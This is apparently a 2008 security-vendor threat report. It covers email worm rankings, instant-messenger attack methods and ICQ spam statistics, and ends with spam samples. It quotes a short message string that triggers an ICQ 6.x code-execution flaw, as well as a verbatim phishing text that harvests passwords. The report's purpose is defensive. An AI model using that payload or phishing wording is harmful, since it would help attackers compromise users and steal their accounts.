Top 20 Viruses for May 20th 2008
Position Change in position Name Proactive Detection Flag Percentage
1. 0 Email-Worm.Win32.NetSky.q Trojan.generic 23.12
2. +1 Email-Worm.Win32.NetSky.y Trojan.generic 9.70
3. +2 Email-Worm.Win32.Scano.gen Trojan.generic 9.63
4. +4 Email-Worm.Win32.Nyxem.e Trojan.generic 6.75
5. -3 Email-Worm.Win32.NetSky.d Trojan.generic 6.27
6. Return Email-Worm.Win32.NetSky.x Trojan.generic 4.44
7. -1 Email-Worm.Win32.NetSky.aa Trojan.generic 3.74
8. Return Email-Worm.Win32.NetSky.b Trojan.generic 3.26
9. -5 Email-Worm.Win32.Bagle.gt Trojan.generic 2.75
10. Return Net-Worm.Win32.Mytob.u Worm.P2P.generic 2.60
11. +6 Net-Worm.Win32.Mytob.c Trojan.generic 2.40
12. 0 Email-Worm.Win32.Scano.bn Trojan.generic 2.09
13. Return Email-Worm.Win32.NetSky.r Trojan.generic 1.98
14. +4 Email-Worm.Win32.NetSky.t Trojan.generic 1.94
15. Return Net-Worm.Win32.Mytob.bi Trojan.generic 1.65
16. -5 Email-Worm.Win32.Bagle.gen Trojan.generic 1.39
17. -4 Email-Worm.Win32.Mydoom.l Worm.P2P.generic 1.19
18. Return Net-Worm.Win32.Mytob.t Worm.P2P.generic 1.08
19. -3 Email-Worm.Win32.NetSky.c Trojan.generic 0.97
20. New! Net-Worm.Win32.Mytob.cg Worm.P2P.generic 0.90
Other malicious programs 12.15
The May 2008 Email Top Twenty is a short one; this is explained by the well-known fact that virus writers take a break over the summer months. The complete absence of any epidemics in mail traffic, which is obvious from even a cursory glance at this month's rankings, bears this out.
In fact, the only significant change to the rankings was caused by the re-entry of a few worms which have been in circulation for several years now.
Trojan-Downloader programs such as Agent.ica, Agent.hsl, and Diehard that were active during the first four months of 2008 disappeared without trace in May.
The Warezov and Zhelatin worms have not reappeared since dropping out of the Top Twenty back in February. The authors have stopped sending out the executable components of the worms by email, confining themselves to distributing the code via links on infected websites.
This does mean that the threat posed by malicious code in email has declined. However, phishing and spam continue to pose very real threats and have the potential to create just as big a problem for the end user.
Other malicious programs made up a significant percentage (12.15%) of all malicious code found in mail traffic.
The Top Twenty countries which acted as sources of infected emails in May are shown below:
Position Change Country Percentage
1 0 USA 21.72
2 +5 Poland 13.18
3 -1 South Korea 7.88
4 -1 Spain 5.85
5 -1 China 5.15
6 0 France 4.07
7 +1 Germany 3.54
8 -1 Brazil 3.49
9 0 United Kingdom 2.83
10 -2 India 2.82
11 -1 Italy 2.66
12 -1 Isreal 1.80
13 0 Japan 1.66
14 +5 Canada 1.15
15 +2 The Netherlands 1.07
16 -1 Turkey 1.05
17 -1 Australia 1.03
18 -4 Argentina 1.02
19 +1 Russia 0.99
20 New! Austria 0.91
Other Countries 16.13
Summary
Moved up: Email-Worm.Win32.NetSky.y, Email-Worm.Win32.Scano.gen, Email-Worm.Win32.Nyxem.e, Net-Worm.Win32.Mytob.c, Email-Worm.Win32.NetSky.t.
Moved down: Email-Worm.Win32.NetSky.d, Email-Worm.Win32.NetSky.aa, Email-Worm.Win32.Bagle.gt, Email-Worm.Win32.Bagle.gen, Email-Worm.Win32.Mydoom.l, Email-Worm.Win32.NetSky.c.
Returned: Email-Worm.Win32.NetSky.x, Email-Worm.Win32.NetSky.b, Net-Worm.Win32.Mytob.u, Email-Worm.Win32.NetSky.r, Net-Worm.Win32.Mytob.bi, Net-Worm.Win32.Mytob.t, Net-Worm.Win32.Mytob.cg.
No change: Email-Worm.Win32.NetSky.q, Email-Worm.Win32.Scano.bn.
Instant threats
IM clients
For many people, communicating online has become an integral part of daily life. The multitude of options for communicating with others – email, chat, forums, blogs, etc. — all occupy their own specific place on the Internet. Instant messengers (IM), which allow users to talk to others anywhere in the world in real time, are one of the popular alternatives.
In order to use IM, a user needs an Internet connection and a client application installed on their PC. There are lots of IM applications and almost all support the same basic functions, allowing a user to search for other users with similar interests, access personal profiles, choose a status mode, etc. A number of IM clients (or Internet pagers, as they are sometimes called) offer additional features.
The most popular IM client in Russia is undoubtedly ICQ – a playful abbreviation of the phrase “I seek you”. Every ICQ user has a unique number, or UIN (Unified Identification Number) that s/he uses to log on. Each UIN is protected by a password set by the user. Messages are sent via the TCP/IP transport protocol using a format specially created by the developer Mirabilis. As a rule, a single message consists of one TCP packet. Some other clients also make use of modified versions of this protocol to send messages, e.g. QIP (Quiet Internet Pager) and Miranda.
Microsoft’s MSN Messenger (or Windows Live Messenger) is another IM client popular with users in the West. MSN Messenger uses Microsoft Notification Protocol (MSNP, also known as Mobile Status Notification Protocol). The MSNP2 protocol is publically available, although other versions are not publically available. The latest version of MSN Messenger uses version MSNP14.
QQ, an IM application similar to ICQ, is very popular in China.
Figure 1. The Chinese IM client QQ
As well as standard IM functions, Skype also offers voice chat. This client, which is popular around the world, allows users to exchange voice messages for free. To do this, the user needs a headset and a computer with the application and an Internet connection. Skype can also be used to call any telephone number, although this is not a free service.
IM threats
Unfortunately, the virtual world is open to abuse and instant messaging applications are not immune. IM is often the target of the following malicious activities:
Stealing passwords to IM accounts using brute force attacks or social engineering.
Spreading malware (this can be done in two ways):
Messages are sent which contain links; if the user clicks on the link, a malicious program file is downloaded to the user’s PC. Social engineering is used to tempt the user to open the file and by doing so, launch the malicious program.
Messages are sent which contain links to infected websites.
Spam.
All IM applications are vulnerable to some type of threat. Take, for instance, the popular Chinese IM client QQ. Trojan-PSW.Win32.QQPass, and a related program, Worm.Win32.QQPass, are both widespread in China and were specially created to steal QQ client passwords. WormWin32.QQPass propagates by copying itself to removable media along with an autorun.inf file (this ensures the worm will be launched on an uninfected computer as long as the Autorun function is enabled).
Skype has also not escaped the attention of virus writers. Worm.Win32.Skipi spreads via Skype by sending a link to its executable file to all Skype contacts on the victim machine. The worm also spreads by copying itself to removable media together with a file called "autorun.inf". In addition to this, it will prevent antivirus solutions and Windows from being updated by editing the hosts file, and also attempts to terminate processes associated with security applications. And of course, the picture wouldn't be complete without a Trojan: Trojan-PSW.Win32.Skyper is designed to steal Skype account passwords.
Microsoft’s MSN Messenger is actively used to spread IRC bots. Many of them are capable of propagating via the messaging client when they receive a command from a remote user via a backdoor. For instance, if a cybercriminal has a small botnet s/he wants to extend, s/he sends a command to backdoors on the infected machines. The command instructs the machines to send a message with a link such as http://www.***.com/www.funnypics.com to all MSN Messenger contacts on those machines. After that, everything depends on the person that receives the message. If he decides to look at the “funny pics”, that means another computer will be added to the zombie network – by clicking on the link the user downloads a backdoor to his/her machine.
Malicious users exploit MSN Messenger because it is included in the Windows installation package. This means all Windows users automatically have the MSN client on their machines. The popularity of MSN around the world makes it all the more attractive to cybercriminals wanting to increase the number of infected computers in their botnets.
Figure 2. Part of Backdoor.Win32.SdBot.clg.
The underlined sections show the commands used to spread the Trojan
ICQ threats
This section provides an overview of the most common attack methods used to target IM clients, using ICQ as an example.
Password theft
As mentioned above, all ICQ users have a Unified Identification Number, or UIN. At the moment, nine-digit numbers are the most common. However, many users are keen to have a UIN that is identical to their mobile phone number, a numerical palindrome, or in which all the digits are the same. Such UINs are easy to remember and, for some, a matter of prestige. ICQ numbers with five, six or seven digits, which may contain only two different numbers, are seen as being particularly valuable.
‘Attractive’ UINs are traded, often fetching high prices. Many sites even have a number ordering service that promises to “obtain” the number wanted by the customer. Moreover, batches of unremarkable nine-digit numbers are offered to those interested in sending mass mailings. Using multiple numbers to distribute spam makes it possible to evade the anti-spam blacklists used by irritated users to ignore specific numbers.
The vendors of such ‘prestigious’ numbers rarely mention how the numbers are obtained. E-commerce sites contain assurances that the UINs are being sold legally. In most cases, however, the vendor has acquired the ICQ numbers by illegal means.
A number of methods are used to steal UINs. The multitude of Internet stores selling attractive UINs often engage in industrial-scale password searches and account theft. Another method is to steal the password to the ICQ user’s primary email and then use it to change the original UIN password without the user’s knowledge. Here's a more detailed overview of how this works.
ICQ technical support offers a service for users that have forgotten their UIN passwords. The process of restoring a password has been modified several times and has become more sophisticated. It now acts as a fairly reliable safeguard against password theft. Users are required to answer a question that they themselves set. If they have forgotten the answer, then the question can be changed using their primary email – the email address entered in the contact information during registration. The process is reasonably secure, but if a third party has somehow gained access to the primary email, the UIN is there for the taking. After obtaining the password to the primary email it is possible for a malicious user to contact ICQ pretending to be an account holder who has forgotten his or her UIN password. The malicious user can then prevent the original owner from accessing not only his or her ICQ account but also the primary email simply by changing the old password. Theft of this kind is not easy – obtaining passwords to email accounts linked to ICQ numbers requires a very powerful computer or even network.
However, the most popular method for stealing ICQ numbers is by using malicious programs, and Trojan-PSW.Win32.LdPinch in particular. It's over the last few years that this family of Trojans has come to pose a threat to users. LdPinch not only steals passwords to ICQ and other IM clients such as Miranda but also to email accounts, various FTP programs, online games etc. There are dedicated constructor programs designed to create specific types of malicious Trojans. Such programs make it possible to set parameters defining which user passwords the malware will steal once installed on the victim machine. Once the program has been configured, the malicious user only has to provide an email address where confidential information will be sent. The ease with which these malicious programs can be created means they are prevalent not only in mail traffic but also in IM traffic.
Figure 3. Constructor used to create Trojan-PSW.Win32.LdPinch
Spreading malicious programs
Mail traffic contains a range of malware families which either spread themselves, or are sent via spam. ICQ, however, is generally used to spread three types of malicious program:
IM worms – these malicious programs use the IM client to self-propagate.
Trojans designed to steal passwords, including passwords for ICQ numbers (in the vast majority of cases, it is Trojan-PSW.Win32.LdPinch).
Malicious programs classified by Kaspersky Lab as Hoax.Win32.*.* (malware created to fraudulently obtain money from users).
How exactly is ICQ used to spread malware?
IM worms require little or no user interaction to spread. When run, many IM worms send themselves to the IM contacts on the victim machine. These worms have a range of functions: they can steal passwords, create botnets and, sometimes the payload is purely destructive (e.g. deleting all .mp3 files from the victim machine). Malicious programs such as Email-Worm.Win32.Warezov and Email-Worm.Win32.Zhelatin (Storm Worm) have used ICQ to actively spread.
However, in most cases user action is required to ensure that an attack will be successful. A wide variety of social engineering ploys can be used to make a potential victim click on a link, and open a file if one is downloaded from the link.
Here's an example of an attack designed to download malware to the victim’s machine. First of all, the malicious user creates several user accounts with seductive profile information (e.g. “pretty girl, 22, looking for a man”). Bots (small programs with primitive intelligence that can support a basic conversation) are then linked to that profile number. The first thing users usually want to see is a photograph of the “pretty girl”; the bot responds to such requests by sending a link. Needless to say, the link doesn't lead to a photo, but to a malicious program.
A variation on the above is when a link to a malicious program is inserted in the personal details of the “girl”. This type of attack requires more effort than the previous method. For example, at least a few of the main personal information fields have to be filled in and potential victims have to be selected. Then a conversation has to be struck up to ensure that users are tempted to click on the link to “nice photos from the Pacific coast” in the “girl’s” personal details.
Social engineering ploys are also used when spreading malicious programs with the help of ICQ spam. More precisely, it's not the malware itself that is spread – users are sent links to malicious programs.
Links in spam can also lead to sites (legitimate ones that have been hacked, or ones which have been specially created) which contain Trojan-Downloader programs. These downloaders then install other malicious software on the victim computer. A more detailed description of such attacks is given below.
Browser vulnerabilities (in particular, those in Internet Explorer) are frequently exploited to download malware with the help of malicious code already placed on a website. First of all, a popular legitimate site will be attacked, and code (e.g., iframe or encrypted JavaScript) placed on its pages. This code will in turn download a malicious program to the computers of those who visit the site. Another technique is to create a simple site on cheap or free web hosting – a site which contains similar downloader code. The site will then be advertised using mass mailing via IM mailing. If a user clicks on a link to the site, malicious software will be secretly downloaded to the victim machine. The user may not even suspect that the site s/he visited was attacked or was a fake. Meanwhile, LdPinch or IRCBot will be busily running on the infected computer.
The vulnerabilities used in carrying out such attacks can be present in the instant messaging applications themselves. In many cases the vulnerability can lead to buffer overflow and the execution of arbitrary code on a system, or provide remote access to a computer without the user's knowledge or consent.
If the malicious code that is run on a system after a buffer overflow is able to self-propagate, then by using the same application vulnerability on other machines the program can penetrate the computers of a significant number of users, causing an epidemic. Exploiting vulnerabilities requires a high degree of technical skill, and this limits, to some extent, the options open to cybercriminals.
ICQ spam has recently been used to spread fake programs that supposedly generate pin codes for cards used to pay for various mobile phone services. Kaspersky Lab detects these programs as not-virus.Hoax.Win32.GSMgen. In actual fact, such software generates unlimited quantities of randomly generated numbers that are supposed to be pin codes for cards used to top up telephone accounts. The results generated by the program are encrypted and in order to decipher them a key has to be obtained from the author, which, of course, comes at price. The sum is usually small – about $10-$15 – which makes the offer even more attractive. The reasoning goes something like this: “I pay $15 once and then I can use my mobile phone for the rest of my life for free!” The fact that the number received in return for payment does not top up an account makes this an everyday case of fraud. (It should be noted that if the program did indeed generate pin codes to pay for mobile services, the price would be significantly higher, and the authors would keep a much lower profile so as not to attract the attention of mobile operators and law enforcement agencies.)
ICQ spam
Unlike email spam, ICQ spam has not been researched in depth. Below are the results of a small study conducted from February 23 to March 23, 2008. The research involved categorizing the subjects of unwanted messages sent to ICQ users and performing a comparative analysis of ICQ spam vs. email spam.
Popular subjects in ICQ spam
The subjects in ICQ spam messages are quite varied and can include advertisements for a new website or game server, requests to vote for somebody in a contest, offers to buy expensive mobile phones at reduced prices or messages that include URLs that lead to malicious programs. A spam link can lead to a website with an exploit that uses vulnerabilities in Internet Explorer or other popular browsers (messages with malicious links were not classified as a separate category for the purposes of this study).
Figure 4. Distribution of ICQ spam by subject
Advertising of Entertainment Sites (18.47%) came top of the rankings. In all probability, this category will continue to lead the ICQ spam statistics. The main reason for its popularity is the effectiveness of this type of spam. Take a typical situation when someone who has been working on a computer for a long period receives an ICQ message about a new website with lots of funny images/stories/videos etc. It is very likely that the tired user will follow the link in the message as a diversion from work.
The Adult Spam category in second place (17.19%) circulates messages similar to those in email spam that advertise dating sites, porn resources, individuals pages which contain erotic material etc.
The Online Income category (15.83%) includes messages that promise money in return for clicking on banners, visiting certain websites and looking at advertising. It also includes network (or multilevel) marketing offers.
The Other Spam category (12.77%) consists of messages on different subjects, each of which account for a relatively low percentage of spam traffic, making it impossible to classify them in individual categories. Some of the message authors in this category have very vivid imaginations. They send a variety of chain letters, toothpaste ads, predictions by archbishops of a fascist dictatorship in Russia, etc. Among the goods advertised, DVDs and car parts are predominant. ICQ phishing messages, which will be discussed later in this article, also fall into this category.
Messages related to ICQ in some way were included in the category in fifth position of our ranking (8.17%). One interesting phenomenon is “ICQ chain letters”, most of which contain the following text (translated from Russian):
“WARNING !!! Starting 1.12, ICQ will beCome a paid
service. You can prevent this, send this message to
20 people from your contact list. This is not a
joke (source www.icq.com) If you send it 20
times you will receive an email and your flower
will beCome blue. I.e. you will be among those
who are against. If voting wins, ICQ will
reMain free.”
The only things that change are the date and the number of people to whom the message is supposed to be sent. Interestingly, some messages contain multi-level quoting, indicating that many users really believe someday their “flower will become blue” and ICQ will remain free forever.
Messages in different languages that urge users to upgrade to the new, sixth version of the ICQ client are also sent on a regular basis. At first, it was unclear why these messages were so popular among spammers. There was unconfirmed information that ICQ 6.x includes a vulnerability that leads to errors when processing messages formed in a certain way. On February 28, 2008 this was confirmed: according to http://bugtraq.ru, “…sending a specially formed … message (in the simplest case, "%020000000s") to a user with ICQ 6.x installed results in an error when generating HTML code to display messages in the embedded Internet Explorer component. This error may lead to the execution of arbitrary code on the remote system.” This vulnerability is not present in the latest build of the ICQ client.
Messages in the Computer Games category (5.79%) can be divided into two large groups. Messages in the first group advertise various browser-based online games, those in the other – game servers, mostly for Lineage II and Counter-Strike.
Offers of Illegal Services (5.45%) are only one third of a percentage point behind computer game ads. These offer users the chance to get the password to a specific mailbox, organize a DoS attack, make counterfeit documents (both Russian and non-Russian), and learn how to hack credit cards or obtain the information necessary to do so – all for a price.
Eighth position (5.28%) went to the category containing messages that ask users to vote for specific participants in a range of Internet contests.
Job and joint business offers came ninth (4.17%) and offers of computer services, including hosting, tenth (3.22%).
The Mobile Spam message group at the end of the rankings (2.72%) also consists of two types of messages. The first type includes messages that advertise websites selling mobile phones. The prices of popular models on such sites are often significantly lower than market prices, raising suspicions as to the origin and legality of such telephones. The second type is messages that advertise sites with a variety of mobile content.
During the period from February 23 to March 23, 2008, no more than 1% of messages in ICQ spam were found to be advertising medications or health related services.
Phishing messages are also occasionally sent to ICQ users. These messages were not categorized as an individual group because they are relatively rare. Cybercriminals use social engineering methods when attempting to obtain passwords to users’ UINs. The success or failure of such attacks largely depends on how well informed a user is. If there are genuine problems, as a rule the official ICQ support service will inform users of the problems, but it will never ask them to send their passwords by email or enter it in a web form on a website.
Figure 5. Phishing message sent in an attempt to obtain an ICQ account password
Hello, this is a message from the ICQ security system. An attempt
has been made to steal your ICQ number. To prevent this in the future, it is
recommended that you send your ICQ number and password for processing to
our address administrat-icqo2008@rambler.ru. You will receive a reply
within an hour. Thank you for using our system.
Distinguishing characteristics of ICQ spam
Unlike email, ICQ makes it possible to search for people based on the interests described in their user contact information. This makes it possible for cybercriminals to target specific audiences with their spam. It is fairly easy for spammers to get relevant data (in most cases, the ages and interests of users) and use it to gain the attention of spam recipients.
Practically all spam messages come from UINs that are not on the user’s contact list. The number of unwanted messages received by a user in any given period of time depends on the UIN. Users with six-digit UINs receive an average of 15 to 20 unwanted messages every hour, many of which contain links to Trojan-PSW.Win32.LdPinch. Users with nine-digit numbers that have nothing special about them receive an average of 10 to 14 such messages every day, while users with 'attractive' numbers get 2 to 2.5 times more spam.
In terms of message subjects, ICQ spam significantly differs from email spam. While about 90% of email spam advertises various goods and services, the proportion of such advertising in ICQ spam is less than 13% (the total share of the Illegal Services, Computer Services, Mobile Spam and Medical Spam categories), with Illegal Services (5.45%) being the largest of all the categories offering services.
On the whole, entertainment-related subjects predominate in ICQ spam. The reason for this is that ICQ is rarely used for business communication, while most of its users are young people. Spammers take the interests of their target audience into account: ICQ spam is dominated by invitations to visit entertainment sites and by ‘adult’ advertisements. Spam in the Computer Games, Voting and Mobile Spam categories also targets young people. On the whole, young people are targeted by about 50% of all spam messages.
The low share of ‘medical’ spam (traditionally a leading category in email spam) is also determined by the target audience. In ICQ spam, the share of this category is below 1%. Apparently, ICQ users do not respond as required to advertising of medical goods and services.
Distinguishing characteristics of ICQ spam:
Targets a young audience.
Overall bias towards entertainment.
Virtually no advertising of consumer goods. Exceptions are offers for mobile phones and pharmaceuticals, as well as a small number of messages which fall into the category of Other Spam.
Relatively high percentage (8.17%) of messages related to ICQ itself.
Significant proportion (5.45%) of messages offering illegal services. The most popular offers are email and ICQ hacking, counterfeit documents, credit card hacking.
An attack scenario
The user launches a file downloaded using a link received via ICQ, but the photo promised by the spammer never shows up on the screen. The user waits for a minute or two, and in the meantime the Trojan searches the computer for passwords stored on it. Some of the passwords are encrypted, but they can be easily decrypted by the cybercriminal. Then the Trojan collects all the passwords found and creates an email message containing all the confidential information collected. The message is sent to the cybercriminal’s email address which was created a couple of days prior to the attack. To prevent the Windows firewall from warning the user of the danger, the Trojan disables the firewall by modifying the relevant registry key. The Trojan also takes similar action against other programs that could prevent it from stealing passwords and other important information from the user. Finally, the malicious program creates a .bat file that deletes both the Trojan and itself, thereby destroying any traces of malicious activity.
By the time a user begins to suspect that something suspicious is going on, the hacker will have processed tens or hundreds (depending on the mailing size) of messages with passwords sent by the Trojan. Incidentally, many users remain unaware that any malicious activity has taken place at all. In any case, the only evidence the user has is a link to a non-existent photo, so the chances of tracing the cybercriminal are very slim.
Users often console themselves by saying they had nothing of importance on their computers anyway. But a hacker or cybercriminal wouldn't agree: s/he now has an impressive list of passwords to email accounts, FTP clients and online games, as well as the user’s bank account and, yes, the ICQ account itself.
You could ask why the hacker might need one more nine-digit number that nobody knows. This is why: s/he will enter the password in their ICQ client and gain access to the user’s contact list. A message will then be sent to all users on the contact list asking them to lend 50 e-dollars and promising to repay the debt the next day. The rest will depend on the recipients’ generosity and their relationship with the user whose account has been stolen. Usually, it is not too difficult to persuade a hesitant user to oblige. At the same time, the hacker will be chatting to other users on the contact list, trying to persuade them to pay up as well. Even if only one person on every victim’s contact list agrees to pay the virtual money to the hacker, the latter will receive a considerable amount of money comparable to the daily wages of a good programmer or even more – all for an hour of chatting.
What about the FTP account? What will happen if the FTP server to which the cybercriminal gained access using the stolen password stores the web pages belonging to a sufficiently popular website? The cybercriminal will be able to add a simple iframe or encrypted JavaScript code at the end of each web page, which will surreptitiously download and launch a malicious program to all computers used to view the site.
All the actions described above are easy to automate. A cybercriminal can easily find ICQ UINs to send spam to on numerous dating sites and forums. More precisely, this will be done by a special program that does all the routine work, including filtering out duplicate numbers and checking the spam list for inactive numbers. Then the hacker will upload a Trojan to a website registered with a free hosting service and will send a link to the website using the spam list created by the hacker’s software. After this, another program will sort the numerous messages sent by the Trojans launched on victim computers and categorize the passwords received. The list of new ICQ numbers received from the Trojan will be converted to a new spam list. If an infected user’s ICQ number turns out to be attractive (i.e., easy to remember), it can be sold later for a large amount of money. And then the final stage – sending messages with convincing requests to lend a little money. If a reply to the request is received, it's time for the hacker to get involved and use his or her knowledge of psychology and social engineering techniques. After this, the ‘hijacked’ numbers can be sold wholesale to spammers. The process described above may sound like fiction, but in actual fact, such schemes are quite common.
To summarize, here's a list of why cybercriminals attack IM clients:
Selling stolen ICQ numbers (nine-digit numbers are sold wholesale and ‘attractive’ numbers are sold individually for significant amounts of money).
Creating spam lists for sale to spammers or for mass distribution of malicious programs.
Using the contact lists of victims as trusted sources to ‘borrow’ money.
Downloading malicious programs using software vulnerabilities.
Changing the web pages of legitimate sites (using FTP server passwords) to download malicious software to visitors’ computers.
Creating botnets or extending existing zombie networks.
Other malicious activity.
Counteracting attacks on IM systems
What can users do against such sophisticated and relentless attacks? Defend themselves, naturally! Below is advice to help readers protect themselves against threats that spread via IM clients.
First of all, be careful and do not click thoughtlessly on links in received messages. Listed below are several types of messages that users should view with extreme caution:
Messages received from unknown users with strange nicknames (such as SbawpathzsoipbuO).
Messages from users on your contact list which ask you to take a look at new photos which have an.exe file extension.
Messages that allegedly contain sensational news of an affair between two celebrities with “a report from the scene”. The ‘report’ in this case is usually a link to the following file: http://www.******.com/movie.avi.exe. It is highly likely that this link will lead to Trojan-PSW.Win32.LdPinch.
Messages suggesting that the user download a program which will provide new opportunities e.g., “NEW BUG in ICQ enabling you to create any number that does not exist”. A link in the message will no doubt lead to a program, but that program will steal the user’s UIN rather than create a new account number.
Such messages should simply be ignored.
If a message comes from a user you know, find out whether they really sent it. And of course, do not download a file with an .exe extension and launch it. Even if the file extension is not specified in the link, you could be redirected to another page that contains malicious software.
As always, users should observe the elementary rules of ‘computer hygiene’: an antivirus product with up-to-date databases and a firewall which blocks unauthorized network connections should be installed on the computer. It is a good idea for the antivirus product to include proactive protection that detects malicious programs based on their behavior and/or a heuristic analyzer.
Users are often unaware of the fact that a malicious program has been run on their computer. Friends or contacts may provide clues to the fact that the PC has been infected. One example would be a friend asking “Why did you ask me to lend you 50 WebMoney units yesterday when we chatted on ICQ?” when the real owner of the ICQ account did no such thing. Another, even more obvious, indication of an infection is a fruitless attempt to use the login or password for a service: unsuccessful authorization attempts mean that the password has been changed. By whom? Either by the official service provider or by a cybercriminal. In the first case the user will either get a new password or notice that the password has been changed sent via email or some other means. If a cybercriminal is to blame, this will not happen.
What should be done if a Trojan has delivered its malicious payload and then deleted itself from the computer? First of all, make sure the computer really is clean by scanning it with an antivirus program. Then change any passwords the Trojan may have stolen, if possible. To do this, try to remember which programs require passwords and try to enter these passwords. If your attempt is successful, change the password immediately. It also makes sense to send the relevant alert to all users on your contact list and ask them not to respond to requests sent from your IM account asking to borrow money, and not to attempt to view photos by following links sent in an IM message.
Installing the latest version of ICQ downloaded from the official ICQ website can help to prevent execution of arbitrary code on the system that is made possible by an ICQ 6.x vulnerability related to processing HTML code.
You can take the following steps to protect yourself from ICQ spam.
Since spammers can check a user’s ICQ status using a website, it makes sense to block this feature in your ICQ client. Spam mailings usually target users who actively chat on ICQ or at least are always online. Therefore, it’s best to remain in invisible mode whenever possible. However, some programs can tell other users whether you are actually offline or just invisible. In this situation, you can use an anti-spam bot – a simple module supported by some IM clients (such as QIP). The screenshot below shows the configuration of a simple anti-spam bot.
Figure 6. Configuration of a simple anti-spam bot
How does an anti-spam bot work? If a user who is not in your contact list wants to chat to you, they will have to answer a question before they can start chatting. They will not be able to send you any messages until the question is answered. It is a good idea to use questions that everyone knows the answers to, such as “how much is 2+2*2?” or “what is the name of our planet?” If the user writes “6” or “Earth” respectively and sends the message, they will then be allowed to send you further messages. This protection is relatively successful at blocking a range of bots that send spam, although some of these bots may be intelligent enough to answer the most popular questions, e.g., the default questions used in protection modules.
Conclusion
Instant messaging programs are very attractive to malicious users of all kinds, and because of this the problem of malware distribution via IM clients is serious. New versions of IM clients contain as yet unknown vulnerabilities, which can be identified first by hackers and only afterwards by program developers. Such situations can easily lead to mass epidemics. Some users are also extremely tired of getting unwanted messages (IM spam).
Currently, there are no methods or solutions designed specifically to protect IM clients. However, observing the simple rules of ‘computer hygiene’, and using a well-configured anti-spam bot combined with a healthy dose of common sense can help users enjoy worry-free chat via the Internet.
Evolution of spam
Spam in mail traffic
Spam in mail traffic averaged 86.2% in April 2008. A low of 68.6% was recorded on 28 April, while a high of 93.9% occurred on 9 April. The share of graphical spam declined considerably in April compared to March and was only 13%.
Spam by category
In April the top five leading spam categories remained unchanged from the previous month:
Medications, health-related goods and services (16.4%)
Education (15.6%)
Fake designer watches (11.6%)
Travel and tourism (9.8%)
Computers and the Internet (4.3%)
The Medications, health-related goods and services category maintained its leading position. The lion’s share of spam in this category is English-language adverts for viagra, which is so popular because no prescription is required to buy it (viagra is classified as a prescription drug in a number of countries). In Russia, however, viagra is freely available at any drug store, so Russian-language adverts for it are rare.
An interesting new trend in April, therefore, was the appearance of Russian-language spam advertising viagra. The text of the message was translated from an English-language version. The site mentioned in the advertisement by the spammers included the caveat “Generic viagra for sale here”, which continued: “exact copy of the world’s most famous medication for male erectile dysfunction”. The fact that Russian consumers are only really attracted by low prices meant the mailing was short-lived.
П.робл.е.ма. п.овышения потенци.и вст.ала в посл.еднее время особен.но остро не то..лько д.ля му.жчин .ста.рше 60-ти лет, но и д.ля 40 и 3.0-ле.тних му.жчин. По данн.ым Всемирной Организации Здравоохранения каждый десятый му.жчина ст.арше 2.1 года с.тра.дает по.ниже.нной по.тенцией, а каждый третий мужчина с.тарше 60 лет не спо.собе.н на половой акт. По.ниженн.ую п.от.енцию. можно. лечи.ть! В этом в.ам поможет всемирно и.звес.тн.ый п.репарат Виагр.а .В отли.чие от других с.по.собов .леч.ен.ия. эрек.тил.ьной .дис.функц.ии,. котор.ые .пре..ду.см.атривают .проведение уко.лов в .пол.ов.ой чл.ен или другие медицинские про.цед..уры, Виа.г.ра является прост.ым, удобным. и лег.ко .прим.еняемым пр.епар.атом. При. ис.пользовании "Виагры." Вы .просто принимает.е одну таблетку тогда, к.огда план..ируете сексуальны.й контакт Пре.им.ущ.ества .В.иагры - Эффективна у 91.% .мужчин, в отличи.е о.т а.нало.гов, та.ких как Сеалекс,. Им.паза, Вука..-Ву.ка - Де.йствует в .теч.ении. 6 часов после пр.иема - Действует на естественные ме.хани.змы возникновения э.рек.ции - Применяется у м.уж.чин, страдающи.х эректильной дисфу.нкцией ра.зли.чно.го п.роисхожде.ния (сосудистые, не.рвн.ые р.асст.ройс.тва эре.кции) - Пр.ин.имает.ся н.епос.редстве.нно пере.д половым ак.том - Практически не. им.еет п.обочн.ых эффект.ов Приобрести этот пр.епарат .можно зд.есь
A Russian-language advert for viagra. The body of the text is interspersed with full stops that break up the individual words.
As the school year draws to an end, spammers actively exploited the theme of school leaving exams and higher education entry exams, keeping the Education category in second place. Another popular theme was the option of avoiding entry exams altogether.
У Вас осталось полтора месяца чтобы поступить на дистанционное обучение БЕЗ ЕГЭ!
According to Russian legislation, the results of school-leaving exams are only valid for a year. Entering a higher educational institution after that period means the exams have to be passed once again. The advert above offers a way of avoiding repeat exams: a certificate with the required pass results can be obtained by simply signing up for a distance-learning course and paying a “fee”. Those interested in the offer are told to hurry and apply before June 10, 2008, and also to tell their friends.
Spam messages offering fake designer goods remained in third place. The sale of replica goods also took on an unexpected “political” slant. In the run up to the inauguration of Russia’s new president, spam messages started offering “A watch like Putin’s”. A cheap copy of the outgoing president’s chronometer was not the only thing on offer: lots of other goods of a similar “quality” were also available.
Часы как у Путина Легендарные часы Раtek Рhilippе В.В.Путина!!! Всего за 325 евро (реплика)! Ты хочешь походить на Президента, но не переплачивать 50000 евро?
Это возможно, причем реплики не уступают оригиналам ни по качеству ни по внешнему виду. Сравните сами:
Часы Patek Philippe Perpetual Calendar (часы В.В.Путина)
Страна производитель: оригинал - Швейцария, реплика - Бельгия
Стоимость: оригинал - 53000 евро, реплика - 325 евро.
Механизм: оригинал - Швейцария, реплика - Швейцария.
Срок службы: оригинал - 10 лет, реплика - 6 лет.
Гарантия: оригинал - 24 месяца, реплика - 18 месяцев
. Удобство покупки: оригинал - 2 бутика в России, в Москве. Реплика - бесплатная доставка в любой город России (страны СНГ).
Внешнее сходство: реплика на 100% идентична оригиналу!
Ознакомьтесь {LINK}
тел. 8-800-2000-720 (звонок из России - бесплатный)
Кроме того в Интернет магазине {LINK} в продаже ещё более 189 часов
престижнейших мировых марок:
Rado (от 299 евро), Rolex (от 325 евро), Omega (от 242 евро), Vacheron Constantin (до 1749 евро), Breguet (от 449 евро), Cartier (от 229 евро)!
юмфм фдтхю вг фла ц аа дбцяа щгд
эвх дажжд гюбч тцмяг
ыу црфщи жеюпу г шж б рояшь ц
ияфп зш э новкп
сюшшо м бшв р угещь
ьвл тгжну зштив хвцвл
у лош дфвыя прв илл
Translation:
A watch like Putin’s The legendary Patek Philippe watch of V.V. Putin!!! For just 325 euros (replica)! You want to look like the President, but don’t want to pay 50000 euros?
Now it’s possible, and the replica is no different from the original in terms of both quality and looks. Compare for yourself:
Patek Philippe Perpetual Calendar watch (the watch of V.V. Putin)
Made in: original – Switzerland, replica - Belgium
Cost: original – 53000 euros, replica – 325 euros.
Mechanism: original – Switzerland, replica – Switzerland.
Service life: original – 10 years, replica – 6 years.
